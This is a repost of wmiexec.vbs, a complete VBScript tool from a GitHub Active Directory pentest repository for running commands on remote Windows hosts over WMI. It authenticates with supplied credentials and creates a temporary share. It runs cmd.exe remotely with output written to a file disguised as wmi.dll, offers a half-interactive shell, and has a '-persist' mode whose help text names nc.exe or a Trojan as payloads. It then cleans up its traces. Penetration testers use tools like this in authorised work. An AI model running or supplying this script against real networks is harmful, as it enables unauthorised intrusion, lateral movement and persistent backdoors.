AD-Pentest-Script/wmiexec.vbs at master · Twi1ight/AD-Pentest-Script

AD-Pentest-Script/wmiexec.vbs at master · Twi1ight/AD-Pentest-Script
2018-06-12 03:07:19 Author: github.com(查看原文) 阅读量:74 收藏

	On Error Resume Next
	'################################ Temp Result File , Change it to where you like
	Const Path = "C:\windows\temp\"
	Const FileName = "wmi.dll"
	Const timeOut = 1200
	'################################
	file = Path & "\" & FileName
	file = Replace(file,"\\","\")
	Set fso = CreateObject("Scripting.FileSystemObject")
	FilePath = fso.GetParentFolderName(file) 'for wmi create share
	'WScript.Echo FilePath

	WAITTIME = timeOut 'ms time to execute command ,read result file after 1200ms

	Set objArgs = WScript.Arguments
	intArgCount = objArgs.Count
	If intArgCount < 2 Or intArgCount > 5 Then
	WScript.Echo "WMI Remote Command Executor By. [email protected]"
	WScript.Echo " Usage:" & _
	vbTab & "wmiexec.vbs /shell host" & _
	vbNewLine & vbTab & "wmiexec.vbs /shell host user pass" & _
	vbNewLine & vbTab & "wmiexec.vbs /cmd host command" & _
	vbNewLine & vbTab & "wmiexec.vbs /cmd host user pass command" & vbNewLine & _
	vbNewLine & vbTab & " /shell" & vbTab & "half-interactive shell mode" & _
	vbNewLine & vbTab & " /cmd" & vbTab & vbTab & "single command mode" & _
	vbNewLine & vbTab & " host" & vbTab & vbTab & "hostname or IP address" & _
	vbNewLine & vbTab & " command" & vbTab & "the command to execute on remote host" & _
	vbNewLine & vbNewLine & vbTab & " -waitTIME" & vbTab & _
	"[either mode] ,delay TIME to read result,"& vbNewLine & vbTab & _
	vbTab & vbTab &"eg. 'systeminfo -wait5000' 'ping google.com -wait2000'" & _
	vbNewLine & vbTab & " -persist" & vbTab & _
	"[either mode] ,running command background and persistent" & vbNewLine & vbTab & _
	vbTab & vbTab &"such as nc.exe or Trojan"
	WScript.Quit 1
	End If

	If LCase(objArgs.Item(0)) <> "/cmd" And LCase(objArgs.Item(0)) <> "/shell" Then
	WScript.Echo "WMIEXEC ERROR: Wrong Mode Specified!"
	WScript.Quit 1
	End If
	boolShellMode = True
	If LCase(objArgs.Item(0)) = "/cmd" Then boolShellMode = False
	If boolShellMode = False Then command = objArgs.Item(intArgCount - 1)

	host = objArgs.Item(1)
	If intArgCount > 3 Then
	user = objArgs.Item(2)
	pass = objArgs.Item(3)
	Set objShell = CreateObject("WScript.Shell")
	strNetUse = "cmd.exe /c net use \\" & host & " """ & pass & """ " & "/user:" & user
	'WScript.Echo strNetUse
	objShell.Run strNetUse,0
	End If
	'Output Status
	WScript.Echo "WMIEXEC : Target -> " & host
	WScript.Echo "WMIEXEC : Connecting..."

	Set objLocator = CreateObject("wbemscripting.swbemlocator")
	If intArgCount >2 Then
	set objWMIService = objLocator.connectserver(host,"root/cimv2",user,pass)
	Else
	Set objWMIService = objLocator.ConnectServer(host,"root/cimv2")
	End If
	If Err.Number <> 0 Then
	WScript.Echo "WMIEXEC ERROR: " & Err.Description
	WScript.Quit 1
	End If
	WScript.Echo "WMIEXEC : Login -> OK"
	WScript.Echo "WMIEXEC : Result File -> " & file

	boolPersist = False
	'Create Share
	CreateShare()
	CurrentFolder = Null
	'-----single Command mode------
	If boolShellMode = False Then
	WAITTIME = 5000
	WScript.Echo vbNewLine & vbTab & host & " >> " & command
	boolGetFolder = False
	strResult = PhraseCmd( command )
	'WScript.Echo strResult
	If strResult = "persist" Then
	boolPersist = True
	Exec command,"nul"
	Else
	Exec command, file
	ReadResult()
	End If
	If intArgCount > 3 Then
	Set objShell = CreateObject("WScript.Shell")
	strNetUse = "cmd.exe /c net use \\" & host & " /del"
	objShell.Run strNetUse,0
	End If
	DeleteShare()
	WScript.Quit 0
	End If
	'------------------------------

	'++++++++shell mode++++++++++++
	'get current working directory
	boolGetFolder = True
	CurrentFolder = Exec("cd", file)

	'WScript.Echo CurrentFolder
	Do While True
	boolPersist = False
	WAITTIME = timeOut
	wscript.stdout.write(CurrentFolder & ">")
	command = wscript.stdin.ReadLine
	'press 'Enter' directorly
	Do While command = ""
	wscript.stdout.write(CurrentFolder & ">")
	command = wscript.stdin.ReadLine
	Loop
	If LCase(Trim(command)) = "exit" Then Exit Do
	'If Not IsEmpty(command) Then
	'process 'cd' command-------->>>>
	strResult = PhraseCmd( command )
	If strResult = "cd" Then
	command = command & " & cd "
	boolGetFolder = True
	DestFolder = Exec(command, file)
	If CurrentFolder = DestFolder Then
	WScript.Echo "The system cannot find the path specified."
	Else
	CurrentFolder = DestFolder
	End If
	ElseIf strResult = "persist" Then
	boolPersist = True
	'WScript.Echo "persist"
	Exec command,"nul"
	'##########################################toDo
	'-----------<<<<
	Else
	On Error Resume Next
	err.clear
	Exec command, file
	ReadResult()
	If err.number <> 0 Then wscript.echo( "WMIEXEC ERROR: " & Err.Number & " " & err.description)
	Err.Clear
	On Error Goto 0
	End If
	loop

	strDelFile = "del " & file & " /F"
	Exec strDelFile,"nul"
	If intArgCount > 3 Then
	Set objShell = CreateObject("WScript.Shell")
	strNetUse = "cmd.exe /c net use \\" & host & " /del"
	objShell.Run strNetUse,0
	End If
	DeleteShare()

	'#####################################
	Function PhraseCmd(cmd)
	PhraseCmd = False ' not 'cd'
	arrCommand = Split(cmd)
	strExe = arrCommand(0)
	If LCase(Trim(strExe)) = "cd" Or LCase(Trim(strExe)) = "cd.exe" Then PhraseCmd = "cd" ' is 'cd'
	Set regEx = New RegExp
	regEx.Pattern = "^[a-z]:$"
	regEx.IgnoreCase = True
	Set Matches = regEx.Execute(cmd)
	If Matches.Count <> 0 Then PhraseCmd = "cd" ' is 'd:'
	'phrase time command
	regEx.Pattern = "(.*?)-wait(\d+)"
	regEx.IgnoreCase = True
	Set Matches = regEx.Execute(cmd)
	If Matches.Count <> 0 Then
	Set objMatch = Matches(0)
	command = objMatch.SubMatches(0)
	'WScript.Echo "Command :" & command
	WAITTIME = CInt(objMatch.SubMatches(1))
	WScript.Echo "WMIEXEC : Waiting " & WAITTIME & " ms..." & vbNewLine
	End If
	'phrase persist command
	regEx.Pattern = "(.*?)-persist"
	regEx.IgnoreCase = True
	Set Matches = regEx.Execute(cmd)
	If Matches.Count <> 0 Then
	Set objMatch = Matches(0)
	command = objMatch.SubMatches(0)
	PhraseCmd = "persist" ' is quiet
	End If
	End Function

	Function CreateShare()
	'create share
	Set objNewShare = objWMIService.Get("Win32_Share")
	intReturn = objNewShare.Create _
	(FilePath, "WMI_SHARE", 0, 25, "")
	If intReturn <> 0 Then
	WScript.Echo "WMIEXEC ERROR: Share could not be created." & _
	vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
	Select Case intReturn
	Case 2
	WScript.Echo "WMIEXEC ERROR: Access Denied!"
	Case 9
	WScript.Echo "WMIEXEC ERROR: Invalid File Path!"
	Case 22
	WScript.Echo "WMIEXEC ERROR: Share Name Already In Used!"
	Case 24
	WScript.Echo "WMIEXEC ERROR: Directory NOT exists!"
	End Select
	If intReturn <> 22 Then WScript.Quit 1
	Else
	WScript.Echo "WMIEXEC : Share created sucess."
	WScript.Echo "WMIEXEC : Share Name -> WMI_SHARE"
	WScript.Echo "WMIEXEC : Share Path -> " & FilePath
	End If
	End Function

	Function DeleteShare()
	Set colShares = objWMIService.ExecQuery _
	("Select * from Win32_Share Where Name = 'WMI_SHARE'")
	For Each objShare In colShares
	intReturn = objShare.Delete
	Next
	If intReturn <> 0 Then
	WScript.Echo "WMIEXEC ERROR: Delete Share failed." & _
	vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
	Select Case intReturn
	Case 2
	WScript.Echo "WMIEXEC ERROR: Access Denied!"
	Case 25
	WScript.Echo "WMIEXEC ERROR: Share Not Exists!"
	End Select
	Else
	WScript.Echo "WMIEXEC : Share deleted sucess."
	End If
	End Function

	Function Exec(cmd, file)
	Set objStartup = objWMIService.Get("Win32_ProcessStartup")
	Set objConfig = objStartup.SpawnInstance_
	objConfig.ShowWindow = 12

	Set objProcess=objWMIService.get("Win32_Process")
	strExec = "cmd.exe /c " & cmd & " > " & file & " 2>&1" '2>&1 err
	If boolPersist Then
	strExec = cmd
	intPath = InStr(cmd,"\")
	If intPath = 0 Then strExec = CurrentFolder & "\" & strExec
	End If
	'WScript.Echo strExec
	intReturn = objProcess.Create _
	(strExec, CurrentFolder, objConfig, intProcessID) 'Add CurrentFolder (strExec, Null, objConfig, intProcessID)
	If intReturn <> 0 Then
	WScript.Echo "WMIEXEC ERROR: Process could not be created." & _
	vbNewLine & "WMIEXEC ERROR: Command -> " & cmd & _
	vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
	Select Case intReturn
	Case 2
	WScript.Echo "WMIEXEC ERROR: Access Denied!"
	Case 3
	WScript.Echo "WMIEXEC ERROR: Insufficient Privilege!"
	Case 9
	WScript.Echo "WMIEXEC ERROR: Path Not Found!"
	End Select
	Else
	' WScript.Echo "Process created." & _
	' vbNewLine & "Command: " & cmd & _
	' vbNewLine & "Process ID: " & intProcessID
	If boolPersist Then WScript.Echo "WMIEXEC : Process created. PID: "& intProcessID
	If boolGetFolder = True Then
	boolGetFolder = False
	Exec = GetCurrentFolder()
	Exit Function
	End If
	'ReadResult()
	End If
	End Function

	Function ReadResult()
	WScript.Sleep(WAITTIME)
	UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & FileName
	Set fso = CreateObject("Scripting.FileSystemObject")
	Set objFile = fso.OpenTextFile(UNCFilePath, 1)
	If Not objFile.AtEndOfStream Then strContents = objFile.ReadAll
	objFile.Close
	WScript.Echo strContents
	'fso.DeleteFile(UNCFilePath) win2008 fso has no privilege to delete file on share folder
	strDelFile = "del " & file & " /F"
	Exec strDelFile,"nul"
	End Function

	Function GetCurrentFolder()
	WScript.Sleep(WAITTIME)
	UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & FileName
	Set fso = CreateObject("Scripting.FileSystemObject")
	Set objFile = fso.OpenTextFile(UNCFilePath, 1)
	GetCurrentFolder = objFile.ReadLine
	objFile.Close
	strDelFile = "del " & file & " /F"
	Exec strDelFile,"nul"
	End Function

文章来源: https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs
如有侵权请联系:admin#unsafe.sh